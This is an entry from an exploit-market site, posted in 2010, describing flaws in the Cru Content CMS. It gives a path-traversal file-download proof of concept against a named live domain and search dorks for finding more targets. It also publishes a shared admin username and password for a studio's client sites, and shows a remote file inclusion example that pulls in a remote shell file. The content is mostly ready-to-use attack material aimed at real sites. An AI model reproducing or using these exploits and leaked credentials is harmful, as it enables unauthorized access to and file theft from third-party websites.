[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Cru Content CMS remote file disclosure vulnerability

Author
fx0
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11184
Category
web applications
Date add
06-03-2010
Platform
unsorted
====================================================
Cru Content CMS remote file disclosure vulnerability
====================================================

[~]"Cru Content" Remote File Download Vulnerability
[~]CMS Site:crudigital.com.au<http://crudigital.com.au>
[~]Dork:"Powered By Cru Content"
[~]POC:www.cloudland.tv/cms/download.php?file=../index.php<http://www.cloudland.tv/cms/download.php?file=../index.php>
[~]Found by fx0

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~]This vuln is just pure human stupidity
[~]You can find vuln links here = http://www.warpstudio.com/hrvatski/reference/
[~]For every site the username and the password is the same
[~]Admin path /admin/
[~]Username:atila
[~]Password:bicbozji
[~]Found by fx0.

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~]Dork: inurl:".php?func=page_cms"
[~]Ex: www.site.com/index.php?func=<http://www.site.com/index.php?func=><shell.txt?>
[~]Found by fx0.


+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+




#  0day.today [2024-11-16]  #